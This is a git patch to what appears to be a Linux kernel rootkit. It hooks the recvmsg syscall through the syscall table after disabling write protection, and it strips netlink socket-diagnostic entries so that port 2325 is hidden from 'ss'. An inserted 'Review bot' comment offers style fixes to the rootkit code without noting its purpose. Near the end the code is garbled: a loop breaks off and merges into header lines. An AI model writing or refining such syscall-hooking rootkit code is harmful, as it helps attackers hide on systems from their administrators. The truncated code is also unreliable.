From 3e30a6df32ee4d5c3f374b26d9e2a694154bbd9c Mon Sep 17 00:00:00 2001
From: Jan Koerner
Date: Sun, 8 Dec 2019 13:33:50 +0100
Subject: [PATCH] Socket von ss verstecken

---
 src/8008135.c | 3 ++
 src/h1d3p0r7.c | 77 ++++++++++++++++++++++++++++++++++++++++++
 src/headers/h1d3p0r7.h | 8 +++--
 3 files changed, 86 insertions(+), 2 deletions(-)

diff --git a/src/8008135.c b/src/8008135.c
index 851ce00..2484f63 100644
--- a/src/8008135.c
+++ b/src/8008135.c
@@ -35,11 +35,13 @@ static int __init init_8008135(void) {
 sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents];
 sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read];
+ sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];
 wprotectionoff();
 sys_call_table[__NR_getdents] = sys_getdents_new;
 sys_call_table[__NR_read] = sys_read_fake;
+ sys_call_table[__NR_recvmsg] = my_recvmsg_syscall;
 wprotectionon();
@@ -63,6 +65,7 @@ static void __exit exit_8008135(void) {
 sys_call_table[__NR_getdents] = sys_getdents_orig;
 sys_call_table[__NR_read] = sys_read_orig;
+ sys_call_table[__NR_recvmsg] = sys_recvmsg_orig;
 wprotectionon();
 }
diff --git a/src/h1d3p0r7.c b/src/h1d3p0r7.c
index 026f7b5..5d16ec0 100644
--- a/src/h1d3p0r7.c
+++ b/src/h1d3p0r7.c
@@ -27,6 +27,7 @@ *******************************************************************************/
 sys_read_ptr sys_read_orig;
+original_recvmsg_syscall sys_recvmsg_orig;
 /*******************************************************************************/
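Review bot: In the init_8008135 hunk of src/8008135.c the new line `sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];` is written differently from the two lookups it sits between, which index the table as `((void**)sys_call_table)[...]` and cast the entry to the matching function-pointer typedef, whereas the new line indexes `sys_call_table` directly and goes through `void *`. Using the typedef the header hunk already declares for it, `sys_recvmsg_orig = (original_recvmsg_syscall)((void**)sys_call_table)[__NR_recvmsg];`, keeps the three lookups uniform and makes the conversion explicit instead of relying on an implicit `void *` assignment. The same mixed style does not affect the exit_8008135 hunk, where the restore lines already match their neighbours. The body of init_8008135 starts before this hunk and continues past it, so whatever follows `wprotectionon();` is not visible here.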
@@ -106,3 +107,79 @@ asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
 // return number of bytes read
 return result;
 }
+
+/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original
+ `recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink
+ socket with the help of some netlink utility macros. If a netlink socket is being used, we
+ iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the
+ source and destination ports with our list of hidden ones. In order to hide an entry we copy
+ the remaining entries over it and adjust the data length which is returned to the user. */
+
+asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags)
+{
+ long ret;
+ struct nlmsghdr *nlh;
+ long count;
+ int found;
+ char *stream;
+ int offset;
+ int i;
+ struct inet_diag_msg *r;
+ int port;
+ /* Call original `recvmsg` syscall */
+ ret = sys_recvmsg_orig(sockfd, msg, flags);
+
+ /* Some error occured. Don't do anything. */
+ if (ret < 0)
+ return ret;
+
+ /* Extract netlink message header from message */
+ nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);
+
+ /* Number of bytes remaining in message stream */
+ count = ret;
+
+ /* Set flag specifying whether message contains data to be masked */
+ found = 1;
+
+ /* NLMSG_OK: This macro will return true if a netlink message was received. It
+ essentially checks whether it's safe to parse the netlink message (if indeed
+ is a netlink message) using the other NLMSG_* macros. */
+ while (NLMSG_OK(nlh, count)) {
+
+ if (found == 0)
+ /* NLMSG_NEXT: Many netlink protocols have request messages that result
+ in multiple response messages. In these cases, multiple responses will
+ be copied into the `msg` buffer. This macro can be used to walk the
+ chain of responses. Returns NULL in the event the message is the last
+ in the chain for the given buffer. */
+ nlh = NLMSG_NEXT(nlh, count);
+
+ r = NLMSG_DATA(nlh);
+ port = ntohs(r->id.idiag_sport);
+ if(port == 2325){
+ /* Message contains data to be masked */
+ found = 1;
+ }else{
+ found = 0;
+ continue;
+ }
+
+
+ stream = (char *) nlh;
+
+ /* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
+ up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
+ offset = NLMSG_ALIGN((nlh)->nlmsg_len);
+
+ /* Copy remaining entries over the data to be masked */
+ for (i=0 ; i #include #include +#include /* Needed for ntohs */
 #define __NR_read 0
-
+#define __NR_recvmsg 47
 typedef asmlinkage long (*sys_read_ptr)(unsigned int fd, char __user *buf, size_t count);
+typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned);
 /**** var **********************************************************************
 *******************************************************************************/
 extern sys_read_ptr sys_read_orig;
-
 extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf, size_t count);
+extern original_recvmsg_syscall sys_recvmsg_orig;
+extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned);
+
 #endif